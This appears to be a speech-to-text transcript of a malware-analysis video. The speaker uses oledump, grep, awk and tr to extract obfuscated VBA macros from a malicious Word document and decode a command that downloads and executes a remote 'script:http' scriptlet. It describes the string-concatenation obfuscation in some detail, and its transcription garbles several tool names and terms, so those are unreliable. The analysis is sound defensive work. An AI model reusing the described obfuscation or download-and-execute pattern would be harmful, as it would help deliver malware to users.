 Hello, I'm B.D. Stevens. In this video I'm going to analyze a malicious document using my OLA Dump tool to analyze a Word document here, but then I'm just going to use standard Linux tools and older tools to analyze the microcode, the VBA code. So let's start with OLA Dump. This is our sample and in stream 8 it contains macros. There are a lot of VBA lines. So let's take a look at this. Select 8. Decompress VBA macros. And here indeed we have our macros. Probably a lot of obfuscation here, meaningless code. And we need to find actually the code that interests us. Now I once wrote a diary entry on an internet storm center with one simple method to try to find the important code and that is grabbing for dots. Because a dot here, a single dot, is used in method invocation. So with that we can select lines that have a method invocation. But here unfortunately we get a lot of outputs usually you don't get that much. And that's because here of the debug assert that contains a dot. Now the debug assert here is just obfuscation. So again I'm going to use grab to get rid of it. So I'm going to invert the selection and I'm going to select debug assert. So this way I select everything that doesn't contain debug assert. Okay and I still have a lot of code here. You can see a lot of variable assignments that receive the function result of function integer int with float. So that's probably two obfuscation. So let's get rid of that too. Again with the grep-v like this. Okay and now we end up with just a couple of lines. Two application runs. That's what we were looking for. And this one here is text pointer 26. And now we also have those two lines here text pointer. That's because they contain a dot. And that's lucky for us because now we can actually see that text pointer 26. It's a string concatenation obfuscated string concatenation. And probably the command here is somewhere in those lines. So let's grep for text pointer 26 like this. And indeed here this is string concatenation. You have text pointer empty string and then each time concatenation with the output of the int if function where depending on this expression it will select this string or this string. Now if you take a close look here at this first column you can see sc, r, i, p, t, colon, h, d, d, p. So this reads as script, h, d, p and so on. So this is actually the script that we want. So we're going to select those strings here to concatenate and extract our command. Now we just want these lines with the if not the text pointer and not this one here. So instead of grepping for text pointer I'm going to grep for if that function, if function. And that's indeed what we want. Now one way to select this line here is to use the AUK tool, the AWK tool. Because you could say that each line here is a record composed of three fields where the comma is a field separator. So this is field one, this is field two and this is field three and we are interested in field two. We can select this like that with the AUK tool. The separator is the comma and I'm going to select or print field number two like this. And then indeed we can see our script h, d, p. Now we want to concatenate this and also get rid of the space and the double quote. And we can do that with the translate command tr and delete those characters we don't want. So we don't want the space. We don't want the double quote but I should escape this. And we don't want a new line because we want to concatenate like this. And here we have our command scrim h, d, p. So it will download this scriptlet and then execute it. Provided it has not been blocked this script monitor by recent patches from Microsoft.